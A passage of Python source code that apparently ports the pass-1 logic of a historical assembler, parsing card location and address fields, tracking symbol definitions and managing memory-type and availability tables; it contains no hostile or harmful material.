if self._field_cod[0] == FieldCodBit.SYMBOLIC:
# Signal symbolic loc.
self._loc_state |= LocStateBit.SYMBOLIC
                # Analyze history of symbol.
sym_name = common.strip()
symbol = self.anal_symb(sym_name)
if symbol is None:
# symbol is None if sym tab full.
self._loc_state |= LocStateBit.FULL
# In which case treat loc as blank.
else:
# Using old symbol health as rel address, get address of transform word.
sym_xform = self._xforms[symbol.health]
new_health = (sym_xform >> 8*4) & 0xF
elif self._field_cod[0] != None:
if self._field_cod[0] & FieldCodBit.UNSIGNED:
self._field_cod[1] = self._loc_ctr
self._loc_ctr = value
loc_value = self._loc_ctr
if self.incr_lctr():
self._field_cod[1] = None
if loc_value > self.max_loc:
self._loc_ctr = ONES
# Signal oversize.
self._loc_state |= LocStateBit.OVERSIZE
# Use oversize transform on symbol health.
new_health = (sym_xform >> 7*4) & 0xF
loc_value = 0
if self._field_cod[1] is not None:
self._loc_ctr = self._field_cod[1]
loc_value = self._loc_ctr
self.incr_lctr()
self.loc_exit(loc_value, symbol, new_health)
else:
self.ok_l_size(loc_value, symbol, sym_xform, new_health)
def loc_exit(self, loc_value, symbol, new_health):
self._loc_state |= loc_value
if self._loc_state & LocStateBit.SYMBOLIC:
self.sy_def_xit(loc_value, symbol, new_health)
def sy_def_xit(self, loc_value, symbol, new_health):
if symbol is None:
return False
# Branch if this is the only definition.
if symbol.health == 0:
symbol.value = loc_value
symbol.health = new_health
return
symbol = copy.deepcopy(symbol)
symbol.value = loc_value
symbol.health = new_health
sym_fit = self._yul.sym_thr.add(symbol)
if not sym_fit:
# Location-symbol-didn't-fit-in-table-flg.
self._loc_state |= Bit.BIT17
def ok_l_size(self, loc_value, symbol, sym_xform, new_health):
# Look up memory type.
midx = 0
while loc_value > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
bad = False
        # Branch if type doesn't match that supplied.
if (self._yul.switch & MemType.MEM_MASK) != mem_type:
new_health = (sym_xform >> 6*4) & 0xF
self._loc_state |= LocStateBit.WRONG_TYPE
if self._field_cod[1] is not None:
self._loc_ctr = self._field_cod[1]
loc_value = self._loc_ctr
self.incr_lctr()
self.loc_exit(loc_value, symbol, new_health)
return
if sym_xform == self._xforms[5]:
if symbol.value < 0:
leftover_type = MemType.ERASABLE
else:
leftover_type = MemType.FIXED
if (self._yul.switch & MemType.MEM_MASK) != leftover_type:
new_health = (sym_xform >> 6*4) & 0xF
if not self.avail(loc_value, reserve=True):
new_health = (sym_xform >> 5*4) & 0xF
self._loc_state |= LocStateBit.CONFLICT
self.loc_exit(loc_value, symbol, new_health)
def avail(self, loc_value, reserve=False):
available = True
avail_msk = 1 << (loc_value & 0x1F)
avail_idx = loc_value >> 5
if self._yul.av_table[avail_idx] & avail_msk:
available = False
if reserve:
self._yul.av_table[avail_idx] |= avail_msk
return available
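    # avail() keeps one availability bit per location: for example, loc_value 668
    # (octal 1234) maps to word 668 >> 5 = 20 and mask 1 << (668 & 0x1F) = 1 << 28,
    # i.e. bit 28 of av_table[20]; with reserve=True that bit is also set as a side effect.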
def incr_lctr(self):
if self._loc_ctr >= ONES:
return False
self._loc_ctr += 1
return True
# Subroutine in pass 1 to break down the address field of a merge control card. That is, with an op
# code of "CARDNO" or "DELETE". Uses the sentence reader. Sets up FIELDCOD and CNLIMIT as follows:
# FIELD ALL BLANK FIELDCOD=0
# "THROUGH" WITH NUMBER FIELDCOD=B1, CNLIMIT=NUMBER
# "THRU" WITH NUMBER FIELDCOD=B1, CNLIMIT=NUMBER
# "TO" WITH NUMBER FIELDCOD=B2, CNLIMIT=NUMBER
# "WITH" WITH NUMBER FIELDCOD=B3, CNLIMIT=NUMBER
    # The number in the address field may be "SEQBREAK" or "SEQBRK", causing CNLIMIT to become ALF 10000000, or up to 6
    # decimal digits with an optional decimal point. If the point is present, there may be up to four digits to its
# left and up to two digits to its right. If the point is absent and there are four digits or less, the point is
# assumed to be at their immediate right. If the point is absent and there are five or six digits, the point is
# assumed to follow the fourth digit. At least one blank or other terminator must separate the two subfields, but
# no imbedded blanks are allowed in either subfield. If any of these rules are violated or there is a third
# subfield, FIELDCOD is set to all ones and the card is ignored and cussed at for a meaningless address field.
    # The number set up in CNLIMIT is standardized to six digits thus: ALF 0NNNNNN0, with a point assumed after char 5.
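    # A few illustrative address fields and the results this routine produces, following
    # the rules above (a sketch, not an exhaustive list):
    #   "TO 1234"       -> _field_cod[0] = Bit.BIT2, returns 123400
    #   "THRU 1234.56"  -> _field_cod[0] = Bit.BIT1, returns 123456
    #   "WITH SEQBRK"   -> _field_cod[0] = Bit.BIT3, returns Bit.BIT6
    #   "TO 999999"     -> treated as a sequence break, returns Bit.BIT6
    #   (blank field)   -> _field_cod[0] = 0, returns None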
def mccd_adrf(self):
# Set up and call sentence reader.
sentence = self._mon.phi_sentr(self._real.card[16:])
if sentence[0] == '':
# FIXME: Cuss if contains terminator only
self._field_cod[0] = 0
return None
# FIXME: Cuss unwanted terminators.
if sentence[0] in ('THRU', 'THROUGH'):
# Signify THROUGH and go to find number.
self._field_cod[0] = Bit.BIT1
elif sentence[0] == 'WITH':
# Signify WITH.
self._field_cod[0] = Bit.BIT3
elif sentence[0] == 'TO':
# Signify TO.
self._field_cod[0] = Bit.BIT2
else:
self._field_cod[0] = None
return None
if sentence[1] in ('SEQBREAK', 'SEQBRK'):
# Exit when number is sequence break.
return Bit.BIT6
if sentence[1].isspace():
# Bad exit when number is missing.
self._field_cod[0] = None
return None
s3 = -5
cn_limit = '000000'
cardno = sentence[1] + ' '
while True:
# Branch if not a digit.
if not cardno[0].isnumeric():
break
# Branch if this is the fifth digit.
s3 += 1
if s3 == 0:
break
            # Move up previous digits. Plant a before-point digit.
cn_limit = cn_limit[1:4] + cardno[0] + cn_limit[4:]
# Move next character into position.
cardno = cardno[1:]
        # If the fifth or earlier character is not a digit, it must be a decimal point or a blank.
skip_digits = False
if s3 != 0:
if cardno[0] == '.':
cardno = cardno[1:]
elif cardno[0] != ' ':
skip_digits = True
if not skip_digits:
# Plant first digit after point.
if cardno[0].isnumeric():
cn_limit = cn_limit[:4] + cardno[0] + cn_limit[5]
cardno = cardno[1:]
# Plant second digit after point.
if cardno[0].isnumeric():
                cn_limit = cn_limit[:5] + cardno[0]
cardno = cardno[1:]
# Bad exit if queer character. Bad exit if third subfield.
if cardno[0] != ' ' or sentence[2] != '':
self._field_cod[0] = None
return None
# Check for 999999 sequence break.
if cn_limit == '999999':
cn_limit = Bit.BIT6
return int(cn_limit)
def anal_symb(self, sym_name):
if len(sym_name) < 8:
# Append head if there is room
sym_name = ('%-7s%s' % (sym_name, self._head)).strip()
return self._yul.sym_thr[sym_name]
def segnum(self, popo):
# FIXME: IMPLEMENT SEGMENT ASSEMBLIES
return self.send_popo(popo)
def memory(self, popo):
adr_wd = self.adr_field(popo)
try:
if self._field_cod[0] is None:
raise BadMemory(Bit.BIT11)
us_num = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & us_num) != us_num:
raise BadMemory(Bit.BIT11)
popo.health |= (adr_wd[0] << 16) & 0xFFFF0000
if self._field_cod[1] == 0:
adr_wd[1] = adr_wd[0]
elif self._field_cod[1] & FieldCodBit.POSITIVE:
adr_wd[1] = adr_wd[0] + adr_wd[1]
elif adr_wd[0] > abs(adr_wd[1]):
raise BadMemory(Bit.BIT11)
low_lim = adr_wd[0]
hi_lim = abs(adr_wd[1])
if hi_lim >= self.adr_limit:
raise BadMemory(Bit.BIT12)
popo.health |= hi_lim & 0xFFFF
common, value = self.anal_subf(popo.loc_field(), popo)
m_name = common.strip()
# Reject if not symbolic.
if not self._field_cod[0] & FieldCodBit.SYMBOLIC:
raise BadMemory(Bit.BIT8)
if m_name == 'ERASABLE':
# Attach erasable code to upper limit.
mem_type = MemType.ERASABLE
elif m_name == 'FIXED':
# Attach fixed code to upper limit.
mem_type = MemType.FIXED
elif m_name == 'SPEC/NON':
# Attach spec/non code to upper limit.
mem_type = MemType.SPEC_NON
else:
# Reject ill-formed memory card.
raise BadMemory(Bit.BIT8)
low_idx = 0
hi_idx = 0
if low_lim == 0:
# Does req cover all 1st present category.
if hi_lim > self.m_typ_tab[0][1]:
# Put req type in 1st category.
                    self.m_typ_tab[0] = (mem_type, self.m_typ_tab[0][1])
else:
common = 0
# FIXME: go to CHECK TM1
else:
# Use reduced lower limit.
low_lim -= 1
# Find first category affected by request.
while low_lim > self.m_typ_tab[low_idx][1]:
low_idx += 1
hi_idx = low_idx
# go to CHK HI LIM
# Determine end of table.
end_typ_ta = len(self.m_typ_tab) - 1
# Search for last affected category.
while (hi_idx < end_typ_ta) and (hi_lim >= self.m_typ_tab[hi_idx][1]):
hi_idx += 1
# Branch if request is non-trivial.
if (low_idx == hi_idx) and (mem_type == self.m_typ_tab[low_idx][0]):
popo.health |= HealthBit.CARD_TYPE_MEMORY
return self.send_popo(popo)
if hi_lim == self.m_typ_tab[end_typ_ta][1] and low_idx < hi_idx:
self.m_typ_tab[hi_idx] = (mem_type, hi_lim)
# Remove entries entirely spanned.
obsolete = max(hi_idx - low_idx - 1, 0)
for i in range(obsolete):
self.m_typ_tab.pop(low_idx + 1)
hi_idx -= 1
if low_lim < self.m_typ_tab[low_idx][1] and mem_type != self.m_typ_tab[low_idx][0]:
# First affected category is being shortened.
if low_idx == hi_idx:
# The request splits the first category in two. Insert an entry corresponding to
# the bottom half.
old_type, old_lim = self.m_typ_tab[low_idx]
self.m_typ_tab.insert(low_idx, (old_type, low_lim))
if old_lim != hi_lim:
# The high limit does not reach the end of the old region. Insert a new
# entry for the new region's high limit.
self.m_typ_tab.insert(low_idx+1, (mem_type, hi_lim))
else:
# Change the type of the old node.
self.m_typ_tab[low_idx+1] = (mem_type, hi_lim)
popo.health |= HealthBit.CARD_TYPE_MEMORY
return self.send_popo(popo)
else:
# Push back the end of the first category.
self.m_typ_tab[low_idx] = (self.m_typ_tab[low_idx][0], low_lim)
if mem_type == self.m_typ_tab[low_idx][0]:
# The new category matches the type of the first category. Extend out its end.
self.m_typ_tab[low_idx] = (mem_type, hi_lim)
elif self.m_typ_tab[hi_idx][0] != mem_type:
# Insert a new category.
self.m_typ_tab.insert(hi_idx, (mem_type, hi_lim))
except BadMemory as e:
popo.health |= e.args[0]
popo.health |= HealthBit.CARD_TYPE_MEMORY
return self.send_popo(popo)
# Minor subroutines to shift two or three words right by one character.
def _3srt_1c(self, afield):
return ' ' + afield[:-1]
def _2srt_1c(self, afield):
return ' ' + afield[:15] + afield[16:]
    # Subroutine to break an address field down into subfields. Results are delivered in self._field_cod[0:2],
# and returned as adr_wd[0:2], as follows....
# _field_cod[0] all zero Blank address field
# _field_cod[0] None Illegal format
# _field_cod[1] all zero No modifier
# _field_cod[1] indicates signed num Modifier given in adr_wd[1]
# _field_cod[0] indicates symbolic Address symbol in adr_wd[0]
# _field_cod[0] indicates S or US num Value given in adr_wd[0]
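    # Illustrative outcomes (a sketch of the conventions above): a blank field sets
    # _field_cod[0] = 0; a lone unsigned number such as "1234" delivers its value in
    # adr_wd[0]; a lone signed number such as "-5" delivers a signed value in adr_wd[0];
    # "SYMBOL +2" delivers the (head-normalized) symbol in adr_wd[0] and flags the
    # modifier in _field_cod[1], with its value 2 in adr_wd[1].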
def adr_field(self, popo):
adr_wd = [None, None]
if popo.address_1().isspace() and popo.address_2().isspace():
# Indicate blank address field and exit.
self._field_cod[0] = 0
return adr_wd
afield = popo.address_1() + popo.address_2() + ' '*8
# Initially assume no modifier.
self._field_cod[1] = 0
# Set up to look for signs initially.
also_main = None
# Maximum number of NBCs in a subfield.
max_nbcs = 8
while max_nbcs > 0:
# Branch when 2 words are right-justified.
while afield[15] == ' ':
afield = self._2srt_1c(afield)
max_nbcs -= 1
afield = self._3srt_1c(afield)
# Branch if seeking sign and sign not preceded by a blank
if also_main is None and afield[16] in '+-' and afield[15] == ' ':
# Analyze possible modifier
_, value = self.anal_subf(afield[16:], popo, check_blank=False)
# Branch if twasn't a signed numeric subf.
if (self._field_cod[0] & (FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED)) != FieldCodBit.NUMERIC:
break
# Branch if compound address.
if afield[:16].isspace():
# Exit for signed numeric field.
adr_wd[0] = value
return adr_wd
# Indicate presence of modifier.
self._field_cod[1] = self._field_cod[0]
# Save original form of rest of field.
also_main = afield[:16] + ' '*8
# Deliver value of modifier
adr_wd[1] = value
max_nbcs = 8
afield = afield[:16] + ' '*8
continue
# Branch if more NBCs to examine.
if afield[:16].isspace():
# Analyze possible main address.
_, value = self.anal_subf(afield[16:], popo, check_blank=False)
# Branch if not numeric.
if not self._field_cod[0] & FieldCodBit.NUMERIC:
break
# Exit when main address is S or US num.
adr_wd[0] = value
return adr_wd
else:
# Seek another non-blank character.
if max_nbcs == 0:
self._field_cod[0] = None
return adr_wd
if also_main is None:
# Set up putative symbolic subfield.
afield = popo.address_1() + popo.address_2() + ' '*8
else:
# Recover non-modifier part of adr field.
afield = also_main + ' '*8
# Branch when possible head found.
afield = self._3srt_1c(afield)
while afield[16] == ' ':
# Triple shift right to find head.
afield = self._3srt_1c(afield)
# Char preceded by non-blank isn't head.
if afield[15] != ' ':
# Backtrack after no-head finding.
afield = afield[:8] + afield[9:16] + afield[8] + afield[16:]
# Error if symbol is too long.
if afield[15] != ' ' or not afield[:8].isspace():
self._field_cod[0] = None
return adr_wd
# Finish backtracking.
afield = afield[:15] + afield[16] + afield[16:]
# Branch when symbol is normalized.
while afield[8] == ' ':
afield = afield[:8] + afield[9:16] + afield[8] + afield[16:]
# Exit when main address is symbolic.
adr_wd[0] = afield[8:16]
return adr_wd
if not afield[:8].isspace():
# Move symbol right to insert head.
while True:
afield = self._2srt_1c(afield)
# Error if no room for head.
if afield[15] != ' ':
self._field_cod[0] = None
return adr_wd
# Shift until normalized in afield[8:16].
if afield[:8].isspace():
break
# Insert head character.
afield = afield[:15] + afield[16] + afield[16:]
# Exit when main address is symbolic.
adr_wd[0] = afield[8:16]
return adr_wd
# Exit when main address is 1-char sym.
if afield[8:16].isspace():
adr_wd[0] = afield[16:24]
return adr_wd
# Move symbol left to insert head.
while True:
if afield[8] != ' ':
break
afield = afield[:16] + afield[17:24] + afield[15] + afield[24:]
# Insert head character.
afield = afield[:15] + afield[16] + afield[16:]
# Exit when main address is 1-char sym.
adr_wd[0] = afield[8:16]
return adr_wd
def anal_subf(self, common, popo, check_blank=True):
if check_blank and common.isspace():
self._field_cod[0] = 0
return common, None
self._field_cod[0] = FieldCodBit.NUMERIC | FieldCodBit.POSITIVE | FieldCodBit.UNSIGNED
while common[0] == ' ':
common = common[1:] + common[0]
subf = common
dig_file = None
if subf[0] != '0':
if subf[0] in '+-':
self._field_cod[0] &= ~FieldCodBit.UNSIGNED
if subf[0] == '-':
self._field_cod[0] &= ~FieldCodBit.POSITIVE
if subf[1:].isspace():
self._field_cod[0] = FieldCodBit.SYMBOLIC
return common, subf
subf = subf[1:] + ' '
decimal = False
while subf[0] != ' ':
if not subf[0].isnumeric():
if (subf[0] != 'D'):
self._field_cod[0] = FieldCodBit.SYMBOLIC
return common, subf
if not subf[1:].isspace():
self._field_cod[0] = FieldCodBit.SYMBOLIC
return common, subf
if dig_file is None:
self._field_cod[0] = FieldCodBit.SYMBOLIC
return common, subf
# Set up conversion, decimal to binary
decimal = True
break
else:
if subf[0] in '89':
# Telltale bits for 8s and 9s.
self._field_cod[0] |= FieldCodBit.DECIMAL
if dig_file is None:
dig_file = '0'
if dig_file != '0' or subf[0] != '0':
dig_file += subf[0]
subf = subf[1:] + ' '
# Set complaint when 8s or 9s and no D.
if not decimal and self._field_cod[0] & FieldCodBit.DECIMAL:
popo.health |= Bit.BIT9
decimal = True
if decimal:
value = int(dig_file, 10)
else:
value = int(dig_file, 8)
if not self._field_cod[0] & FieldCodBit.POSITIVE:
value = -value
return common, value
def get_tape(self):
if self._sypt is None:
revno = self._yul.revno
if not self._yul.switch & SwitchBit.REPRINT:
revno -= 1
self._sypt = self._yul.yulprogs.find_sypt(self._yul.comp_name, self._yul.prog_name, revno)
if self._sypt is None:
return None
tape_card = self._sypt.readline()
if tape_card == '':
self._sypt.close()
return None
tape_card = tape_card[:80]
tape = POPO(health=0, card=tape_card)
# Clear asterisk if fetching main input, freezing subroutines, or not revising.
cacn = SwitchBit.KNOW_SUBS | SwitchBit.FREEZE_P1 | SwitchBit.REVISION
if (self._yul.switch & cacn) != (SwitchBit.KNOW_SUBS | SwitchBit.REVISION):
if not self._yul.switch & SwitchBit.REPRINT: # FIXME
tape.unmark()
# Branch if no sequence break
if tape.seq_break:
# Set up post-break criterion.
self._tape_cdno = Bit.BIT6
else:
card_no = tape.card[1:7]
tape_card_no = int(card_no, 10)
# Branch if sequence error.
if tape_card_no <= (self._tape_cdno & 0xFFFFFFFFF):
tape.health |= Bit.BIT7
# Set up new criterion
self._tape_cdno = tape_card_no
return tape
def head_tail(self, popo):
if popo.health & HealthBit.ASTERISK:
# Asterisk makes illegal op.
            return self.illegop(popo)
self._head = popo.loc_field().strip()
if self._head == '':
self._head = ' '
else:
self._head = self._head[-1]
# Store head in POPO.
popo.health |= ALPHABET.index(self._head)
popo.health |= HealthBit.CARD_TYPE_HEAD
return self.send_popo(popo)
def erase(self, popo):
popo.health |= HealthBit.CARD_TYPE_ERASE
if popo.health & HealthBit.ASTERISK:
# Asterisk makes illegal op.
return self.illegop(popo)
# Decode address field.
adr_wd = self.adr_field(popo)
if self._field_cod[0] is None:
# When address is meaningless.
popo.health |= Bit.BIT11
return self.er_loc_sym(popo)
unsigned_mask = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & unsigned_mask) == unsigned_mask:
# Lone numeric is both limits.
if self._field_cod[1] == 0:
adr_wd[1] = adr_wd[0]
# Minus sign on modifier means thru.
elif not self._field_cod[1] & FieldCodBit.POSITIVE:
# Upper limit is negative of modifier.
adr_wd[1] = -adr_wd[1]
# Branch if limits are in OK order.
if adr_wd[0] > adr_wd[1]:
# Bad news when lower limit is greater.
popo.health |= Bit.BIT12
return self.er_loc_sym(popo)
else:
# For plus modifier, upper limit is sum.
adr_wd[0] += adr_wd[1]
return self.ch_er_size(popo, adr_wd)
elif self._field_cod[0] == FieldCodBit.SYMBOLIC:
# Error if symbol is not ..ANYWHERE..
if adr_wd[0] != 'ANYWHERE':
popo.health |= Bit.BIT11
return self.er_loc_sym(popo)
# Mark card as leftover.
popo.health |= Bit.BIT15
if self._field_cod[1] == 0:
# When symbol is alone.
adr_wd[1] = 0
return self.eras_lefto(popo, adr_wd)
# Bad news when modifier is minus.
if adr_wd[1] < 0:
popo.health |= Bit.BIT11
return self.er_loc_sym(popo)
# Branch if modifier has OK size
if adr_wd[1] <= 0o77777:
return self.eras_lefto(popo, adr_wd)
# When leftover block length too big.
popo.health |= Bit.BIT12
return self.er_loc_sym(popo)
else:
# Check for illegal loc cntr value.
if self._loc_ctr >= ONES:
popo.health |= Bit.BIT12
return self.er_loc_sym(popo)
# Branch if address field is not blank.
if self._field_cod[0] == 0:
# Erase current location only.
adr_wd[1] = 0
else:
                # Branch if there are 2 signed numeric parts.
if self._field_cod[1] == 0:
adr_wd[1] = adr_wd[0]
else:
adr_wd[1] = adr_wd[0] + adr_wd[1]
# Area begins with loc cntr value anyhow.
adr_wd[0] = self._loc_ctr
            # Negative upper limit means through here. Otherwise hi lim gave relative address of end.
if adr_wd[1] >= 0:
adr_wd[1] += adr_wd[0]
# Ensure positive upper limit.
adr_wd[1] = abs(adr_wd[1])
# Branch if limits are in OK order.
if (adr_wd[0] > adr_wd[1]) or (adr_wd[1] >= self.adr_limit):
popo.health |= Bit.BIT12
return self.er_loc_sym(popo, adr_wd[0])
# For blank or signed num addresses only.
self._loc_ctr = adr_wd[1] + 1
return self.ch_er_size(popo, adr_wd)
def ch_er_size(self, popo, adr_wd):
low_lim = adr_wd[0]
hi_lim = adr_wd[1]
# When address size(s) are wrong.
if hi_lim > self.max_loc or low_lim >= ONES:
popo.health |= Bit.BIT12
return self.er_loc_sym(popo, low_lim)
# Put limits into card.
popo.health |= (low_lim << 16) | hi_lim
# Look up memory type of lower limit.
midx = 0
while low_lim > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
# Error if lower not erasable.
if mem_type != MemType.ERASABLE or hi_lim > self.m_typ_tab[midx][1]:
popo.health |= Bit.BIT13
return self.er_loc_sym(popo, low_lim)
# Check availability of block.
loc_loc = low_lim
while loc_loc <= hi_lim:
if not self.avail(loc_loc, reserve=True):
# Signal conflict.
popo.health |= Bit.BIT14
loc_loc += 1
return self.er_loc_sym(popo, low_lim)
def er_loc_sym(self, popo, low_lim=0):
# Analyze location field of non-leftover.
common, value = self.anal_subf(popo.loc_field(), popo)
if self._field_cod[0] == 0:
# OK exit if blank.
return self.send_popo(popo)
unsigned_mask = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & unsigned_mask) == unsigned_mask:
# Error exit if unsigned numeric.
popo.health |= Bit.BIT16
return self.send_popo(popo)
elif self._field_cod[0] != FieldCodBit.SYMBOLIC:
# OK exit if signed numeric.
return self.send_popo(popo)
# Analyze location symbol.
popo.health |= Bit.BIT8
sym_name = common.strip()
symbol = self.anal_symb(sym_name)
# Error exit if symbol table is full.
if symbol is None:
popo.health |= Bit.BIT16
return self.send_popo(popo)
# Get address of location transforms.
sym_xform = self._xforms[symbol.health]
# Symbol health becomes F if illeg. adr.
if popo.health & Bit.BIT11:
new_health = 0xF
return self.end_is(popo, 0, symbol, new_health)
# Select and apply transform for erase location symbol.
if popo.health & Bit.BIT12:
# Use transform for oversize assignment.
new_health = (sym_xform >> 7*4) & 0xF
return self.end_is(popo, 0, symbol, new_health)
if popo.health & Bit.BIT13:
            # Use transform for wrong memory type.
new_health = (sym_xform >> 6*4) & 0xF
return self.end_is(popo, low_lim, symbol, new_health)
if popo.health & Bit.BIT14:
# Use transform for conflict.
new_health = (sym_xform >> 5*4) & 0xF
return self.end_is(popo, low_lim, symbol, new_health)
# Use normal erase transform.
new_health = (sym_xform >> 8*4) & 0xF
return self.end_is(popo, low_lim, symbol, new_health)
def eras_lefto(self, popo, adr_wd):
# FIXME: implement leftovers
pass
def octal(self, popo):
popo.health |= HealthBit.CARD_TYPE_OCTAL
return self.inst_dec_oct(popo)
def instruct(self, popo):
popo.health |= HealthBit.CARD_TYPE_INSTR
return self.inst_dec_oct(popo)
def decimal(self, popo):
popo.health |= HealthBit.CARD_TYPE_DECML
return self.inst_dec_oct(popo)
def _2octal(self, popo):
popo.health |= HealthBit.CARD_TYPE_2OCTAL
return self._2oct_2dec(popo)
def _2decimal(self, popo):
popo.health |= HealthBit.CARD_TYPE_2DECML
return self._2oct_2dec(popo)
def _2oct_2dec(self, popo):
# Set up later test
self._save_loc = ONES
self._yul.switch &= ~MemType.MEM_MASK
self._yul.switch |= MemType.FIXED
if popo.card[0] == 'J':
# FIXME: Implement leftovers!
pass
else:
# Translate regular location field.
self._loc_state = 0
self.location(popo)
popo.health |= self._loc_state
if popo.health & (Bit.BIT12 | Bit.BIT14) != 0:
# Exit if leftover or oversize location.
return self.send_popo(popo)
# Branch if loc ctr was not saved.
if self._save_loc < ONES:
self._loc_ctr = (popo.health & 0xFFFF) + 1
loc_value = self._loc_ctr
# Branch if size of 2nd loc is OK.
if not self.incr_lctr() or loc_value > self.max_loc:
popo.health |= Bit.BIT14
self._loc_ctr = ONES
return self.dp_loc_end(popo)
# Find memory type (this happened in LOCATION, but wasn't saved in this port)
midx = 0
while loc_value > self.m_typ_tab[midx][1]:
midx += 1
# Branch if 1st loc in bad memory type or end of category.
if (popo.health & Bit.BIT15) or (popo.health & 0xFFFF == self.m_typ_tab[midx][1]):
# Which would mean type error on at least one of the locations.
popo.health |= Bit.BIT15
if popo.health & HealthBit.SYMBOLIC:
# If loc is symbolic and in table, use the DP type error transformation.
sym_xform = 0xFEECEE9EC900FEEC
symbol = self.anal_symb(popo.loc_field().strip())
symbol.health = (sym_xform >> (symbol.health*4)) & 0xF
return self.dp_loc_end(popo)
# Test and reserve 2nd location. Branch if it was available.
if not self.avail(loc_value, reserve=True):
popo.health |= Bit.BIT16
# With same conditions as for type error, use DP conflict transform.
if popo.health & HealthBit.SYMBOLIC:
sym_xform = 0xFEDEEAEEDA00FEDE
symbol = self.anal_symb(popo.loc_field().strip())
symbol.health = (sym_xform >> (symbol.health*4)) & 0xF
return self.dp_loc_end(popo)
def dp_loc_end(self, popo):
if self._save_loc < ONES:
# Restore loc ctr and exit.
self._loc_ctr = self._save_loc
return self.send_popo(popo)
def even(self, popo):
if popo.health & HealthBit.ASTERISK:
# Asterisk makes illegal op.
return self.illegop(popo)
if not popo.address_1().isspace() or not popo.address_2().isspace():
# Cuss mildly at non-blank address fields.
popo.health |= Bit.BIT13
if self._loc_ctr >= self.max_loc:
# Cuss attempt to fly off the end.
popo.health |= Bit.BIT14
elif self._loc_ctr & 1:
# Location is odd, so add one.
self._loc_ctr += 1
popo.health |= HealthBit.CARD_TYPE_EVEN
return self.ch_il_size(popo, self._loc_ctr, [None, None])
def is_equals(self, popo):
popo.health |= HealthBit.CARD_TYPE_EQUALS
return self.decod_adr(popo, 0)
def equ_minus(self, popo):
popo.health |= HealthBit.CARD_TYPE_EQUALS
return self.decod_adr(popo, self._loc_ctr)
def equ_plus(self, popo):
popo.health |= HealthBit.CARD_TYPE_EQUALS
return self.decod_adr(popo, -self._loc_ctr)
def setloc(self, popo):
popo.health |= HealthBit.CARD_TYPE_SETLOC
return self.decod_adr(popo, 0)
def decod_adr(self, popo, loc_loc):
# Asterisk makes illegal op.
if popo.health & HealthBit.ASTERISK:
return self.illegop(popo)
# Decode address field.
adr_wd = self.adr_field(popo)
# Abort if meaningless address field.
if self._field_cod[0] is None:
popo.health |= HealthBit.MEANINGLESS
return self.no_adress(popo, adr_wd)
# Bad loc ctr kills =PLUS and =MINUS now.
if loc_loc >= ONES:
return self.ch_il_size(popo, loc_loc, adr_wd, check_loc=False)
# If blank adr field, fake up absolute.
if self._field_cod[0] == 0:
self._field_cod[0] = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if self._loc_ctr >= ONES:
return self.ch_il_size(popo, loc_loc, adr_wd, check_loc=False)
adr_wd[0] = self._loc_ctr
self._field_cod[1] = 0
if self._field_cod[1] == 0:
# Fake up a modifier if it lacks one.
self._field_cod[1] = FieldCodBit.NUMERIC
adr_wd[1] = loc_loc
else:
            # Combine loc ctr with existing modifier.
adr_wd[1] += loc_loc
# Set up sign of net modifier.
if adr_wd[1] > 0:
self._field_cod[1] |= FieldCodBit.POSITIVE
else:
self._field_cod[1] &= ~FieldCodBit.POSITIVE
unsigned_mask = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & unsigned_mask) == unsigned_mask:
# Branch if main part is unsigned numeric.
pass
elif self._field_cod[0] == FieldCodBit.SYMBOLIC:
# Branch if address field contains a sym.
return self.sym_is_loc(popo, loc_loc, adr_wd)
elif self._loc_ctr >= ONES:
# Branch if location counter is bad.
return self.ch_il_size(popo, loc_loc, adr_wd, check_loc=False)
else:
# Form address relative to L.C. setting.
adr_wd[0] += self._loc_ctr
# Add modifier part to unsigned numeric.
adr_wd[0] += adr_wd[1]
# Go to test size of num + modifier.
loc_loc = adr_wd[0]
return self.ch_il_size(popo, loc_loc, adr_wd)
def sym_is_loc(self, popo, loc_loc, adr_wd):
# Analyze address symbol history.
sym_name = adr_wd[0].strip()
symbol = self.anal_symb(sym_name)
# Exit if symbol table is full.
if symbol is None:
popo.health |= Bit.BIT16
return self.no_adress(popo, adr_wd, symbol)
# Store address of address symbol.
popo.health |= (symbol.index + 1) << 16
if symbol.health > 0x0 and symbol.health < 0x3:
# Signal address nearly defined.
popo.health |= HealthBit.NEARLY_DEFINED
return self.no_adress(popo, adr_wd, symbol)
# Use health of symbol to find transform.
sym_xform = self._xforms[symbol.health]
# Test predefinition bit.
if not sym_xform & 0x1000000000:
# Signal address undefined as yet.
popo.health |= HealthBit.UNDEFINED
return self.no_adress(popo, adr_wd, symbol)
# Test def/no-def bit.
if not sym_xform & 0x2000000000:
popo.health |= HealthBit.ILL_DEFINED
return self.no_adress(popo, adr_wd, symbol)
# Add modifier to symbol definition.
loc_loc = symbol.value
loc_loc += adr_wd[1]
return self.ch_il_size(popo, loc_loc, adr_wd, symbol)
def ch_il_size(self, popo, loc_loc, adr_wd, adr_symbol=None, check_loc=True):
if not check_loc or loc_loc >= ONES:
popo.health |= HealthBit.OVERSIZE
return self.no_adress(popo, adr_wd, adr_symbol)
popo.health |= loc_loc & 0xFFFF
# Branch for normal IS,= path.
if (popo.health & HealthBit.CARD_TYPE_MASK) == HealthBit.CARD_TYPE_EQUALS:
return self.iseq_lsym(popo, loc_loc, adr_wd, adr_symbol)
# Look up memory type for setloc.
midx = 0
while loc_loc > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
if mem_type == MemType.SPEC_NON:
# Signal setloc to spec/non memory.
popo.health |= Bit.BIT10
else:
self._loc_ctr = popo.health & 0xFFFF
return self.nd_setloc(popo)
def nd_setloc(self, popo):
if not popo.loc_field().isspace():
# Cuss about non-blank loc field in loc.
popo.health |= HealthBit.SYMBOLIC
return self.send_popo(popo)
def iseq_lsym(self, popo, loc_loc, adr_wd, adr_symbol=None):
common, value = self.anal_subf(popo.loc_field(), popo)
if self._field_cod[0] != FieldCodBit.SYMBOLIC:
return self.send_popo(popo)
# Signal symb locn, get symbol history.
popo.health |= HealthBit.SYMBOLIC
sym_name = common.strip()
symbol = self.anal_symb(sym_name)
# Abort if symbol table is full.
if symbol is None:
